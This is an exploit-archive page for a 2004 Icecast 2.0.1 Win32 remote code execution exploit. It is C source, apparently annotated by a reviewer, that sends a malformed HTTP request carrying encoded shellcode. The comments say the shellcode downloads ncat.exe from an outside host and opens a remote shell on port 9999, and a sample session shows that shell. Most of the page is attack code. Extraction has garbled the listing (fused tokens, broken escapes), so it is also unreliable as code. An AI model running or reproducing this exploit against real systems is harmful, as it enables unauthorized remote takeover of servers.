
Icecast <= 2.0.1 Win32 Remote Code Execution Exploit

🗓️ 06 Oct 2004 00:00:00Reported by RootType 

Exploit for Icecast <= 2.0.1 on Win32: remote code execution via a malformed HTTP request to the server's listener port (8000 by default; the example run targets 127.0.0.1).

Code

                                                /* 

by Luigi Auriemma 

Shellcode add-on by Delikon 
www.Delikon.de 

Because of all the forbidden bytes in a http get request 
i had to use a very small shellcode, which was blown up 
by Msf::Encoder::PexAlphaNum. Great encoder. 
------------------------------------------------------------------------- 
C:>iceexec 127.0.0.1 

Icecast <= 2.0.1 Win32 remote code execution 0.1 
by Luigi Auriemma 
e-mail: [email protected] 
web:http://aluigi.altervista.org 

shellcode add-on by Delikon 
www.delikon.de 

- target 127.0.0.1:8000 
- send malformed data 

Server IS vulnerable!!! 


C:>nc 127.0.0.1 9999 
Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

C:Icecast2 Win32> 
--------------------------------------------------------------------------- 


*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 

#ifdef WIN32 
#pragma comment(lib, "ws2_32.lib") 
    #include <winsock.h> 
    #include "winerr.h" 

    #define close closesocket 
#else 
    #include <unistd.h> 
    #include <sys/socket.h> 
    #include <sys/types.h> 
    #include <arpa/inet.h> 
    #include <netdb.h> 
    #include <netinet/in.h> 
#endif 

/* Banner version string. */
#define VER "0.1" 
/* Default Icecast listener port; argv[2] overrides it. */
#define PORT 8000 
/* Size of the receive buffer used by the post-send probe in main(). */
#define BUFFSZ2048 
/* Seconds main() waits for any reply before calling the server unresponsive. */
#define TIMEOUT 3 
/* Request template: a GET line followed by 31 one-character header lines and
 * a single 0xcc byte. main() locates that 0xcc with strrchr() and overwrites
 * it with the shellcode string (see the comment block above startWinsock()).
 * NOTE(review): this listing is garbled by extraction (e.g. "BUFFSZ2048",
 * "structsockaddr_in", the line-ending escapes) and is not buildable as shown. */
#define EXEC"GET / HTTP/1.0rn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "arn" "arn" "arn" "arn" "arn" "arn" "arn" 
                "xcc" 
/* Web download-and-execute shellcode. The header comment says it was encoded
 * with Msf::Encoder::PexAlphaNum to avoid the bytes an HTTP request forbids.
 * Per the author it downloads http://www.elitehaven.net/ncat.exe and that
 * ncat then spawns a shell on TCP port 9999 - so an outbound fetch of
 * ncat.exe followed by a new listener on 9999 are the observable indicators.
 * main() splices this string over the 0xcc marker in EXEC with strcpy(). */
char shellcode[] = "xEB" 
"x03x59xEBx05xE8xF8xFFxFFxFFx4Fx49x49x49x49x49x49x51x5Ax56x54" 
"x58x36x33x30x56x58x34x41x30x42x36x48x48x30x42x33x30x42x43x56" 
"x58x32x42x44x42x48x34x41x32x41x44x30x41x44x54x42x44x51x42x30" 
"x41x44x41x56x58x34x5Ax38x42x44x4Ax4Fx4Dx49x4Ex4Ex4Cx42x30x42" 
"x50x42x50x4Fx35x4Ax4Ex48x55x42x50x42x30x42x50x49x48x43x4Cx42" 
"x45x4Ax46x50x58x50x34x50x50x4Ex4Ex4Ax4Ex42x36x42x50x42x30x42" 
"x30x41x43x49x4Cx48x56x49x4Bx4Fx36x50x46x41x55x4Ax56x45x57x44" 
"x57x4Ex36x4Dx46x46x55x4Fx4Fx42x4Dx42x45x4Ax46x48x43x4Cx41x4F" 
"x32x42x57x4Ax4Ex48x44x42x50x42x30x42x30x41x43x49x4Cx41x55x41" 
"x35x4Dx48x47x53x48x55x4Dx38x47x47x4Ax50x48x35x41x35x4Fx4Fx42" 
"x4Dx43x55x4Ax56x4Ax59x50x4Fx4Cx38x50x30x4Ax4Ex4Dx32x42x50x42" 
"x30x42x30x41x55x47x35x4Fx4Fx42x4Dx41x53x49x4Cx49x34x44x4Ex50" 
"x4Fx43x35x4Ax46x50x37x4Ax4Dx44x4Ex43x47x4Ax4Ex49x41x42x30x42" 
"x50x42x30x4Fx4Fx42x4Dx45x55x48x55x46x46x41x4Ax42x53x42x30x42" 
"x30x42x30x4Bx48x42x44x4Ex30x4Bx58x42x37x4Ex51x4Dx4Ax4Bx48x4A" 
"x56x4Ax30x49x58x4Ax4Ex50x45x4Dx55x43x4Cx43x35x45x45x48x55x47" 
"x35x4Bx48x4Ex46x46x42x4Ax31x4Bx58x45x54x4Ex33x4Bx58x46x35x45" 
"x30x4Ax57x41x50x4Cx4Ex4Bx38x4Cx34x4Ax41x4Bx58x4Cx55x42x52x41" 
"x50x4Bx4Ex43x4Ex45x43x49x54x4Bx48x46x53x4Bx48x41x50x50x4Ex41" 
"x53x4Fx4Fx4Ex4Fx41x43x42x4Cx4Ex4Ax4Ax43x42x4Ex46x37x47x50x41" 
"x4Cx4Fx4Cx4Dx50x41x30x47x4Cx4Bx4Ex44x4Fx4Bx33x4Ex37x46x52x46" 
"x51x45x47x41x4Ex4Bx48x4Cx35x46x42x41x50x4Bx4Ex48x56x4Bx58x4E" 
"x50x4Bx44x4Bx58x4Cx55x4Ex31x41x30x4Bx4Ex4Bx48x46x50x4Bx58x41" 
"x30x4Ax4Ex49x4Ex44x30x42x50x42x50x42x50x41x53x42x4Cx49x58x4C" 
"x4Ex4Fx55x50x35x4Dx45x4Bx55x43x4Cx4Ax4Ex4Fx42x4Fx4Fx4Fx4Fx4F" 
"x4Fx4Dx36x4Ax46x4Ax56x50x52x45x56x4Ax57x45x46x42x30x4Ax56x46" 
"x47x46x57x42x57x4Cx43x4Fx42x4Fx32x47x47x47x47x47x47x50x42x45" 
"x36x4Ex56x49x36x46x57x45x56x4Ax36x41x36x48x57x45x36x50x56x50" 
"x32x50x46x45x36x46x47x4Fx42x50x46x43x36x41x56x46x37x50x32x45" 
"x36x4Ax37x45x46x42x50x5A"; 


/* 
in my example 0xcc is used to interrupt the code execution, you must 
put your shellcode exactly there. 
You don't need to call a shellcode offset (CALL ESP, JMP ESP and so 
on) or doing any other annoying operation because the code flow 
points directly there!!! 
Cool and easy 8-) 
*/ 


int startWinsock(void) 
{ 
    /* Initialise Winsock 2.0 for the WIN32 build and return WSAStartup()'s
     * status (0 on success). WSADATA/WSAStartup exist only on Windows, yet the
     * function is defined unconditionally, so this file as written compiles
     * only with WIN32 defined. */
    WSADATA details;
    int status = WSAStartup(MAKEWORD(2, 0), &details);
    return status;
} 

/* Forward declarations; the definitions follow main(). std_err() is defined
 * in this file only for non-WIN32 builds (see the #ifndef at the bottom); on
 * WIN32 it presumably comes from "winerr.h", included above. */
int timeout(int sock); 
u_long resolv(char *host); 
void std_err(void); 

/* Entry point. argv[1] is the target host (dotted quad or name), argv[2] an
 * optional port (default PORT). Builds one HTTP request from EXEC plus the
 * shellcode string, sends it once, and then decides "vulnerable" purely from
 * whether the server still answers (see the verdict comment below). */
int main(int argc, char *argv[]) { 
    /* target endpoint, filled in from resolv() and port */
    structsockaddr_in peer; 
    int sd; 
    u_short port = PORT; 
    /* receive buffer for the post-send probe */
    u_charbuff[BUFFSZ]; 
    /* 4096-byte send buffer: request template plus payload. UCHAR is
     * presumably the Windows unsigned-char typedef pulled in via winsock.h */
UCHAR buf[4096]; 
    /* position of the 0xcc placeholder inside buf */
UCHAR *pointer=NULL; 


    /* unbuffered stdout so the progress lines appear immediately */
    setbuf(stdout, NULL); 

    fputs("n" 
        "Icecast <= 2.0.1 Win32 remote code execution "VER"n" 
        "by Luigi Auriemman" 
        "e-mail: [email protected]" 
        "web:http://aluigi.altervista.orgn" 
  "nshellcode add-on by Delikonn" 
  "www.delikon.de" 
        "n", stdout); 

    if(argc < 2) { 
        printf("nUsage: %s <server> [port(%d)]n" 
            "n" 
            "Note: This exploit will force the Icecast server to download NCATn" 
            "and after execution it will spwan a shell on 9999n" 
            "n", argv[0], PORT); 
        exit(1); 
    } 

#ifdef WIN32 

    /* return value of WSAStartup() is not checked */
    startWinsock(); 
#endif 

    /* atoi() does no range or format checking: a non-numeric argument
     * silently becomes port 0 */
    if(argc > 2) port = atoi(argv[2]); 

    peer.sin_addr.s_addr = resolv(argv[1]); 
    peer.sin_port= htons(port); 
    peer.sin_family= AF_INET; 

    /* copy the request template; EXEC ends with the single 0xcc marker byte */
    memset(buf,0x00,sizeof(buf)); 
    strcpy(buf,EXEC); 
    
    /* locate the marker (last 0xcc in the template). The result is not
     * NULL-checked before the strcpy() below, so a template without the
     * marker would dereference NULL */
pointer =strrchr(buf,0xcc); 

    /* overwrite the marker with the payload string, then terminate the
     * request with a blank line */
strcpy(pointer,shellcode); 

strcat(buf,"rn"); 
strcat(buf,"rn"); 
    

    printf("n- target %s:%hun", 
        inet_ntoa(peer.sin_addr), port); 

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
    if(sd < 0) std_err(); 

    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) 
      < 0) std_err(); 

    /* single send(); only a negative return is treated as an error, a short
     * send is not retried. strlen() gives the full length only if the
     * payload contains no NUL byte - presumably true of the encoded string */
    fputs("- send malformed datan", stdout); 
    if(send(sd, buf, strlen(buf), 0) 
      < 0) std_err(); 

    /* Verdict is a heuristic: no reply within TIMEOUT seconds, or a recv()
     * error, is reported as "vulnerable". A firewalled, slow or already-dead
     * host therefore yields a false positive; any reply at all is taken to
     * mean the request was handled normally. */
    if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) { 
        fputs("nServer IS vulnerable!!!nn", stdout); 
    } else { 
        fputs("nServer doesn't seem vulnerablenn", stdout); 
    } 

    close(sd); 
    return(0); 
} 

int timeout(int sock) { 
    /* Wait up to TIMEOUT seconds for sock to become readable.
     * Returns 0 when the descriptor is ready (data or EOF), -1 when the wait
     * expires; a select() failure is fatal via std_err(). Note that FD_SET on
     * a descriptor >= FD_SETSIZE is undefined behaviour - not guarded here,
     * same as the original. */
    fd_set readable;
    struct timeval limit;
    int ready;

    limit.tv_sec = TIMEOUT;
    limit.tv_usec = 0;
    FD_ZERO(&readable);
    FD_SET(sock, &readable);

    ready = select(sock + 1, &readable, NULL, NULL, &limit);
    if(ready < 0) std_err();
    return (ready == 0) ? -1 : 0;
} 

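u_long resolv(char *host) { 
    /* Resolve host (dotted quad or hostname) to an IPv4 address in network
     * byte order, returned as a u_long holding the 32-bit in_addr_t value.
     * On failure it prints a message and exits; it never returns an error. */
    in_addr_t addr = inet_addr(host);
    if(addr == INADDR_NONE) {
        /* Not a dotted quad (or 255.255.255.255, which inet_addr() cannot
         * tell apart from failure): fall back to a name lookup. */
        struct hostent *hp = gethostbyname(host);
        /* Some resolvers may return a record that is not a plain IPv4
         * address; treat anything but exactly one 4-byte AF_INET address as
         * unresolvable instead of reading the wrong bytes. */
        if(!hp || hp->h_addrtype != AF_INET
              || hp->h_length != (int)sizeof addr
              || !hp->h_addr_list || !hp->h_addr_list[0]) {
            printf("nError: Unable to resolve hostname (%s)n", host);
            exit(1);
        }
        /* memcpy instead of *(u_long *)hp->h_addr: avoids the aliasing /
         * alignment problem and the over-read on platforms where u_long is
         * wider than the 4-byte address. */
        memcpy(&addr, hp->h_addr_list[0], sizeof addr);
    }
    return(addr);
} 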

#ifndef WIN32 
    void std_err(void) { 
        /* Fatal-error helper for non-WIN32 builds: report errno via perror()
         * under the "nError" tag and terminate with status 1. Never returns. */
        const char *tag = "nError";
        perror(tag);
        exit(1);
    } 
#endif 

// sebug.net

                              
